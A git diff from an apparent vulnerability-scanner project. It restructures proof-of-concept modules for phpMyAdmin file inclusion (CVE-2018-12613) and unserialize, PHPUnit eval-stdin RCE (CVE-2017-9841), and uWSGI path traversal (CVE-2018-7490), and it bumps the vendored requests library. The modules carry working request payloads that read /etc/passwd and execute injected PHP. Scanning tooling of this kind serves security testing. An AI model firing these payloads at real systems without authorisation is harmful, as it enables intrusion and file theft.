-                },
-                'Request': res                  # * 会输出一个http数据包
-            }
-            return results
-    return None
diff --git a/payloads/demo/scan_2.py b/payloads/demo/scan_2.py
deleted file mode 100644
index c993bad..0000000
--- a/payloads/demo/scan_2.py
+++ /dev/null
@@ -1,76 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
-from lib.tool import check
-from time import sleep
-import re
-
-3_payloads = [                                  # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads)
-    {
-        'path': '4',                            # ! 4: url路径(例如/admin/login)
-        'data': '5',                            # ! 5: POST数据, 没有的话可以不写
-    },
-]
-
-def 6_scan(clients):                            # ! 6: POC的名称(例如 cnvd_2018_24942_scan)
-    '''  '''
-    client = clients.get('reqClient')           # todo 使用的中转, reqClient是requests的中转
-    # hackClient = clients.get('hackClient')      # todo 使用的中转, hackClient是HackRequests的中转
-    sessid = ''
-    
-    vul_info = {
-        'app_name': '',
-        'vul_type': '7',                        # ! 7: 漏洞类型(例如 RCE)
-        'vul_id': '8',                          # ! 8: 漏洞编号(例如 CNVD-2018-24942)
-    }
-    
-    headers = {}                                # ! 9. 如果该漏洞需要特殊的Headers,例如 User-Agent:Nacos-Server, 则需要填写, 没有的话就不用填
-
-    for payload in 3_payloads:                  # ! 3: 同上, Payload的名称
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        path = payload['path'].replace('DNSDOMAIN', dns_domain)
-        data = payload['data']
-
-        res = client.request(
-            'get',                              # ! 10: 请求方式, 例如get, 不区分大小写
-            path,                               # ! 11: 路径, 注意 “只要路径”, 不需要添加http://xxx.com
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        # todo 判断
-        '''!!!
-            可以自定义results中的信息, 格式:
-                标题: 值(str/list/dict)
-                    str类型: key: value的格式进行显示
-                    list类型: 会以key: value value value ...的格式进行显示
-                    dict类型: 会以↓的格式进行显示
-                            dict:
-                                key1: value1
-                                key2: value2
-                                ...
-                    Response类型: 会以一个http数据包的格式进行显示
-        '''
-        sleep(3)
-        if (dns.result(md, sessid)):               # ! 12: 判断扫描结果
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Payload': {
-                    'Url': res.url,
-                    'Path': path,
-                    'Headers': headers,
-                    'Cookie': 'XXX'
-                },
-                'Request': res                  # * 会输出一个http数据包
-            }
-            return results
-    return None
diff --git a/payloads/phpMyadmin/cve_2018_12613.py b/payloads/phpMyadmin/cve_2018_12613.py
deleted file mode 100644
index 96af548..0000000
--- a/payloads/phpMyadmin/cve_2018_12613.py
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2018_12613_payloads = [
-    {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'},
-    {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../C:\Windows\System32\drivers\etc\hosts'},
-]
-
-def cve_2018_12613_scan(clients):
-    ''' 该漏洞在 index.php, 导致文件包含漏洞 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'phpMyadmin',
-        'vul_type': 'FileInclude',
-        'vul_id': 'CVE-2018-12613',
-    }
-
-    for payload in cve_2018_12613_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/phpMyadmin/main.py b/payloads/phpMyadmin/main.py
deleted file mode 100644
index d3fce22..0000000
--- a/payloads/phpMyadmin/main.py
+++ /dev/null
@@ -1,38 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-PhpMyAdmin 是一个用 PHP 编写的免费软件工具, 旨在通过 Web 处理 MySQL 的管理
-    phpMyadmin扫描类: 
-        1. phpmyadmin 4.8.1 远程文件包含
-            CVE-2018-12613
-                Payload: https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/
-
-        2. Phpmyadmin Scripts/setup.php 反序列化
-            WooYun-2016-199433
-                Payload: https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.phpMyadmin.cve_2018_12613 import cve_2018_12613_scan
-from payloads.phpMyadmin.wooyun_2016_199433 import wooyun_2016_199433_scan
-
-class phpMyadmin():
-    def __init__(self):
-        self.app_name = 'phpMyadmin'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_12613_scan, clients=clients),
-            thread(target=wooyun_2016_199433_scan, clients=clients)
-        ]
-
-phpmyadmin = phpMyadmin()
diff --git a/payloads/phpMyadmin/phpmyadmin-cve-2018-12613-fileinclude-fileread.py b/payloads/phpMyadmin/phpmyadmin-cve-2018-12613-fileinclude-fileread.py
new file mode 100644
index 0000000..9699eef
--- /dev/null
+++ b/payloads/phpMyadmin/phpmyadmin-cve-2018-12613-fileinclude-fileread.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Phpmyadmin Scripts/setup.php 反序列化
+    WooYun-2016-199433
+        Payload: https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/
+
+该漏洞在 index.php, 导致文件包含漏洞
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'},
+            {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'index.php?target=db_sql.php%253f/../../../../../../../../C:\Windows\System32\drivers\etc\hosts'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'phpMyadmin',
+            'vul_type': 'FileInclude',
+            'vul_id': 'CVE-2018-12613',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/phpMyadmin/phpmyadmin-wooyun-2016-199433-unserialize.py b/payloads/phpMyadmin/phpmyadmin-wooyun-2016-199433-unserialize.py
new file mode 100644
index 0000000..580f42a
--- /dev/null
+++ b/payloads/phpMyadmin/phpmyadmin-wooyun-2016-199433-unserialize.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Phpmyadmin Scripts/setup.php 反序列化
+    WooYun-2016-199433
+        Payload: https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/
+
+受影响的版本: 2.x
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'scripts/setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
+            },
+            {
+                'path': 'scripts/setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}'
+            },
+            {
+                'path': 'scripts/setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}'
+            },
+            {
+                'path': 'setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
+            },
+            {
+                'path': 'setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}'
+            },
+            {
+                'path': 'setup.php',
+                'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'phpMyadmin',
+            'vul_type': 'unSerialize',
+            'vul_id': 'WooYun-2016-199433',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/phpMyadmin/wooyun_2016_199433.py b/payloads/phpMyadmin/wooyun_2016_199433.py
deleted file mode 100644
index 6649ba4..0000000
--- a/payloads/phpMyadmin/wooyun_2016_199433.py
+++ /dev/null
@@ -1,64 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-wooyun_2016_199433_payloads = [
-    {
-        'path': 'scripts/setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
-    },
-    {
-        'path': 'scripts/setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}'
-    },
-    {
-        'path': 'scripts/setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}'
-    },
-    {
-        'path': 'setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
-    },
-    {
-        'path': 'setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}'
-    },
-    {
-        'path': 'setup.php',
-        'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}'
-    },
-]
-
-def wooyun_2016_199433_scan(clients):
-    ''' 受影响的版本: 2.x  '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'phpMyadmin',
-        'vul_type': 'unSerialization',
-        'vul_id': 'WooYun-2016-199433',
-    }
-
-    for payload in wooyun_2016_199433_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/phpUint/cve_2017_9841.py b/payloads/phpUint/cve_2017_9841.py
deleted file mode 100644
index 5272f70..0000000
--- a/payloads/phpUint/cve_2017_9841.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_2
-
-cve_2017_9841_payloads = [
-    {
-        'path': 'vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
-        # 'data': '<?=print({NUM1}*{NUM2})?>'
-    },
-    {'path': 'phpunit/phpunit/src/Util/PHP/eval-stdin.php'},
-    {'path': 'phpunit/src/Util/PHP/eval-stdin.php'},
-    {'path': 'src/Util/PHP/eval-stdin.php'},
-    {'path': 'Util/PHP/eval-stdin.php'},
-    {'path': 'PHP/eval-stdin.php'},
-    {'path': 'eval-stdin.php'},
-]
-
-def cve_2017_9841_scan(clients):
-    ''' phpunit是php中的单元测试工具
-    其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码
-        eval('?>'.file_get_contents('php://input'));
-    如果该文件被用户直接访问到，将造成远程代码执行漏洞
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'phpUnit',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2017-9841',
-    }
-
-    for payload in cve_2017_9841_payloads:
-        randint_1, randint_2 = random_int_2() # * 获取2个随机整数, 用于回显漏洞判断
-
-        path = payload['path']
-        data = '<?=print({NUM1}*{NUM2})?>'.format(NUM1=randint_1, NUM2=randint_2)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sum = str(randint_1 * randint_2)
-
-        if (sum in res.text):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/phpUint/main.py b/payloads/phpUint/main.py
deleted file mode 100644
index 5ff466e..0000000
--- a/payloads/phpUint/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-PHPUnit 是 PHP 语言中最常见的单元测试 (unit testing) 框架
-    PHPUnit扫描类: 
-        1. PHPUnit 远程代码执行
-            CVE-2017-9841
-                Payload: https://vulhub.org/#/environments/phpunit/CVE-2017-9841/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.phpUint.cve_2017_9841 import cve_2017_9841_scan
-
-class phpUint():
-    def __init__(self):
-        self.app_name = 'phpUnit'
-        
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2017_9841_scan, clients=clients)
-        ]
-
-phpunit = phpUint()
diff --git a/payloads/phpUint/phpunit-cve-2017-9841-rce.py b/payloads/phpUint/phpunit-cve-2017-9841-rce.py
new file mode 100644
index 0000000..d55de72
--- /dev/null
+++ b/payloads/phpUint/phpunit-cve-2017-9841-rce.py
@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+PHPUnit 远程代码执行
+    CVE-2017-9841
+        Payload: https://vulhub.org/#/environments/phpunit/CVE-2017-9841/
+
+phpunit是php中的单元测试工具
+    其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码
+        eval('?>'.file_get_contents('php://input'));
+    如果该文件被用户直接访问到，将造成远程代码执行漏洞
+'''
+
+from lib.tool.md5 import random_int_2
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
+                # 'data': '<?=print({NUM1}*{NUM2})?>'
+            },
+            {'path': 'phpunit/phpunit/src/Util/PHP/eval-stdin.php'},
+            {'path': 'phpunit/src/Util/PHP/eval-stdin.php'},
+            {'path': 'src/Util/PHP/eval-stdin.php'},
+            {'path': 'Util/PHP/eval-stdin.php'},
+            {'path': 'PHP/eval-stdin.php'},
+            {'path': 'eval-stdin.php'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'phpUnit',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2017-9841',
+        }
+
+        for payload in self.payloads:
+            randint_1, randint_2 = random_int_2() # * 获取2个随机整数, 用于回显漏洞判断
+
+            path = payload['path']
+            data = '<?=print({NUM1}*{NUM2})?>'.format(NUM1=randint_1, NUM2=randint_2)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            sum = str(randint_1 * randint_2)
+
+            if (sum in res.text):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
+def cve_2017_9841_scan(clients):
+    ''' 
+    '''
diff --git a/payloads/uWSGIPHP/cve_2018_7490.py b/payloads/uWSGIPHP/cve_2018_7490.py
deleted file mode 100644
index c4f547e..0000000
--- a/payloads/uWSGIPHP/cve_2018_7490.py
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2018_7490_payloads = [
-    {'path': '..%2f..%2f..%2f..%2f..%2fetc/passwd'},
-]
-
-def cve_2018_7490_scan(clients):
-    ''' uWSGI 2.0.17之前的PHP插件
-            没有正确的处理DOCUMENT_ROOT检测
-            导致用户可以通过..%2f来跨越目录, 读取或运行DOCUMENT_ROOT目录以外的文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'uWSGI-PHP',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2018-7490',
-    }
-
-    for payload in cve_2018_7490_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/uWSGIPHP/main.py b/payloads/uWSGIPHP/main.py
deleted file mode 100644
index 231b450..0000000
--- a/payloads/uWSGIPHP/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-uWSGI是一款Web应用程序服务器, 它实现了WSGI、uwsgi和http等协议, 并支持通过插件来运行各种语言
-    uWSGI PHP扫描类: 
-        uWSGI PHP目录穿越漏洞
-            CVE-2018-7490
-                Payload: https://vulhub.org/#/environments/uwsgi/CVE-2018-7490/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.uWSGIPHP.cve_2018_7490 import cve_2018_7490_scan
-
-class uWSGI_PHP():
-    def __init__(self):
-        self.app_name = 'uWSGI-PHP'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_7490_scan, clients=clients)
-        ]
-
-uwsgiphp = uWSGI_PHP()
diff --git a/payloads/uWSGIPHP/uwsgiphp-cve-2018-7490-fileread.py b/payloads/uWSGIPHP/uwsgiphp-cve-2018-7490-fileread.py
new file mode 100644
index 0000000..7d0e1d2
--- /dev/null
+++ b/payloads/uWSGIPHP/uwsgiphp-cve-2018-7490-fileread.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+uWSGI PHP目录穿越漏洞
+    CVE-2018-7490
+        Payload: https://vulhub.org/#/environments/uwsgi/CVE-2018-7490/
+
+uWSGI 2.0.17之前的PHP插件
+    没有正确的处理DOCUMENT_ROOT检测
+    导致用户可以通过..%2f来跨越目录, 读取或运行DOCUMENT_ROOT目录以外的文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '..%2f..%2f..%2f..%2f..%2fetc/passwd'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'uWSGI-PHP',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2018-7490',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/requirements.txt b/requirements.txt
index 7124ac6..8e5df46 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,7 +1,7 @@
-certifi==2020.12.5
-chardet==3.0.4
+certifi==2022.6.15
+chardet==5.0.0
 flask>=2.0.2
 idna==3.3
 pysocks
-urllib3==1.25.11
+urllib3==1.26.9
 pyyaml
diff --git a/thirdparty/requests/__init__.py b/thirdparty/requests/__init__.py
index 0ac7713..7ac8e29 100644
--- a/thirdparty/requests/__init__.py
+++ b/thirdparty/requests/__init__.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 #   __
 #  /__)  _  _     _   _ _/   _
 # / (   (- (/ (/ (- _)  /  _)
@@ -40,8 +38,10 @@
 :license: Apache 2.0, see LICENSE for more details.
 """
 
-import urllib3
 import warnings
+
+import urllib3
+
 from .exceptions import RequestsDependencyWarning
 
 try:
@@ -54,13 +54,14 @@
 except ImportError:
     chardet_version = None
 
+
 def check_compatibility(urllib3_version, chardet_version, charset_normalizer_version):
-    urllib3_version = urllib3_version.split('.')
-    assert urllib3_version != ['dev']  # Verify urllib3 isn't installed from git.
+    urllib3_version = urllib3_version.split(".")
+    assert urllib3_version != ["dev"]  # Verify urllib3 isn't installed from git.
 
     # Sometimes, urllib3 only reports its version as 16.1.
     if len(urllib3_version) == 2:
-        urllib3_version.append('0')
+        urllib3_version.append("0")
 
     # Check urllib3 for compatibility.
     major, minor, patch = urllib3_version  # noqa: F811
@@ -72,36 +73,46 @@ def check_compatibility(urllib3_version, chardet_version, charset_normalizer_ver
 
     # Check charset_normalizer for compatibility.
     if chardet_version:
-        major, minor, patch = chardet_version.split('.')[:3]
+        major, minor, patch = chardet_version.split(".")[:3]
         major, minor, patch = int(major), int(minor), int(patch)
-        # chardet_version >= 3.0.2, < 5.0.0
-        assert (3, 0, 2) <= (major, minor, patch) < (5, 0, 0)
+        # chardet_version >= 3.0.2, < 6.0.0
+        assert (3, 0, 2) <= (major, minor, patch) < (6, 0, 0)
     elif charset_normalizer_version:
-        major, minor, patch = charset_normalizer_version.split('.')[:3]
+        major, minor, patch = charset_normalizer_version.split(".")[:3]
         major, minor, patch = int(major), int(minor), int(patch)
         # charset_normalizer >= 2.0.0 < 3.0.0
         assert (2, 0, 0) <= (major, minor, patch) < (3, 0, 0)
     else:
         raise Exception("You need either charset_normalizer or chardet installed")
 
+
 def _check_cryptography(cryptography_version):
     # cryptography < 1.3.4
     try:
-        cryptography_version = list(map(int, cryptography_version.split('.')))
+        cryptography_version = list(map(int, cryptography_version.split(".")))
     except ValueError:
         return
 
     if cryptography_version < [1, 3, 4]:
-        warning = 'Old version of cryptography ({}) may cause slowdown.'.format(cryptography_version)
+        warning = "Old version of cryptography ({}) may cause slowdown.".format(
+            cryptography_version
+        )
         warnings.warn(warning, RequestsDependencyWarning)
 
+
 # Check imported dependencies for compatibility.
 try:
-    check_compatibility(urllib3.__version__, chardet_version, charset_normalizer_version)
+    check_compatibility(
+        urllib3.__version__, chardet_version, charset_normalizer_version
+    )
 except (AssertionError, ValueError):
-    warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
-                  "version!".format(urllib3.__version__, chardet_version, charset_normalizer_version),
-                  RequestsDependencyWarning)
+    warnings.warn(
+        "urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
+        "version!".format(
+            urllib3.__version__, chardet_version, charset_normalizer_version
+        ),
+        RequestsDependencyWarning,
+    )
 
 # Attempt to enable urllib3's fallback for SNI support
 # if the standard library doesn't support SNI or the
@@ -114,39 +125,56 @@ def _check_cryptography(cryptography_version):
 
     if not getattr(ssl, "HAS_SNI", False):
         from urllib3.contrib import pyopenssl
+
         pyopenssl.inject_into_urllib3()
 
         # Check cryptography version
         from cryptography import __version__ as cryptography_version
+
         _check_cryptography(cryptography_version)
 except ImportError:
     pass
 
 # urllib3's DependencyWarnings should be silenced.
 from urllib3.exceptions import DependencyWarning
-warnings.simplefilter('ignore', DependencyWarning)
 
-from .__version__ import __title__, __description__, __url__, __version__
-from .__version__ import __build__, __author__, __author_email__, __license__
-from .__version__ import __copyright__, __cake__
-
-from . import utils
-from . import packages
-from .models import Request, Response, PreparedRequest
-from .api import request, get, head, post, patch, put, delete, options
-from .sessions import session, Session
-from .status_codes import codes
-from .exceptions import (
-    RequestException, Timeout, URLRequired,
-    TooManyRedirects, HTTPError, ConnectionError,
-    FileModeWarning, ConnectTimeout, ReadTimeout
-)
+warnings.simplefilter("ignore", DependencyWarning)
 
 # Set default logging handler to avoid "No handler found" warnings.
 import logging
 from logging import NullHandler
 
+from . import packages, utils
+from .__version__ import (
+    __author__,
+    __author_email__,
+    __build__,
+    __cake__,
+    __copyright__,
+    __description__,
+    __license__,
+    __title__,
+    __url__,
+    __version__,
+)
+from .api import delete, get, head, options, patch, post, put, request
+from .exceptions import (
+    ConnectionError,
+    ConnectTimeout,
+    FileModeWarning,
+    HTTPError,
+    JSONDecodeError,
+    ReadTimeout,
+    RequestException,
+    Timeout,
+    TooManyRedirects,
+    URLRequired,
+)
+from .models import PreparedRequest, Request, Response
+from .sessions import Session, session
+from .status_codes import codes
+
 logging.getLogger(__name__).addHandler(NullHandler())
 
 # FileModeWarnings go off per the default.
-warnings.simplefilter('default', FileModeWarning, append=True)
+warnings.simplefilter("default", FileModeWarning, append=True)
diff --git a/thirdparty/requests/__version__.py b/thirdparty/requests/__version__.py
index 0d7cde1..e725ada 100644
--- a/thirdparty/requests/__version__.py
+++ b/thirdparty/requests/__version__.py
@@ -2,13 +2,13 @@
 # |(  |-  |.| | | |-  `-.  |  `-.
 # ' ' `-' `-`.`-' `-' `-'  '  `-'
 
-__title__ = 'requests'
-__description__ = 'Python HTTP for Humans.'
-__url__ = 'https://requests.readthedocs.io'
-__version__ = '2.26.0'
-__build__ = 0x022600
-__author__ = 'Kenneth Reitz'
-__author_email__ = 'me@kennethreitz.org'
-__license__ = 'Apache 2.0'
-__copyright__ = 'Copyright 2020 Kenneth Reitz'
-__cake__ = u'\u2728 \U0001f370 \u2728'
+__title__ = "requests"
+__description__ = "Python HTTP for Humans."
+__url__ = "https://requests.readthedocs.io"
+__version__ = "2.28.1"
+__build__ = 0x022801
+__author__ = "Kenneth Reitz"
+__author_email__ = "me@kennethreitz.org"
+__license__ = "Apache 2.0"
+__copyright__ = "Copyright 2022 Kenneth Reitz"
+__cake__ = "\u2728 \U0001f370 \u2728"
diff --git a/thirdparty/requests/_internal_utils.py b/thirdparty/requests/_internal_utils.py
index 759d9a5..7dc9bc5 100644
--- a/thirdparty/requests/_internal_utils.py
+++ b/thirdparty/requests/_internal_utils.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests._internal_utils
 ~~~~~~~~~~~~~~
@@ -7,11 +5,22 @@
 Provides utility functions that are consumed internally by Requests
 which depend on extremely few external helpers (such as compat)
 """
+import re
+
+from .compat import builtin_str
+
+_VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$")
+_VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$")
+_VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$")
+_VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$")
 
-from .compat import is_py2, builtin_str, str
+HEADER_VALIDATORS = {
+    bytes: (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE),
+    str: (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR),
+}
 
 
-def to_native_string(string, encoding='ascii'):
+def to_native_string(string, encoding="ascii"):
     """Given a string object, regardless of type, returns a representation of
     that string in the native string type, encoding and decoding where
     necessary. This assumes ASCII unless told otherwise.
@@ -19,10 +28,7 @@ def to_native_string(string, encoding='ascii'):
     if isinstance(string, builtin_str):
         out = string
     else:
-        if is_py2:
-            out = string.encode(encoding)
-        else:
-            out = string.decode(encoding)
+        out = string.decode(encoding)
 
     return out
 
@@ -36,7 +42,7 @@ def unicode_is_ascii(u_string):
     """
     assert isinstance(u_string, str)
     try:
-        u_string.encode('ascii')
+        u_string.encode("ascii")
         return True
     except UnicodeEncodeError:
         return False
diff --git a/thirdparty/requests/adapters.py b/thirdparty/requests/adapters.py
index fa4d9b3..d3b2d5b 100644
--- a/thirdparty/requests/adapters.py
+++ b/thirdparty/requests/adapters.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
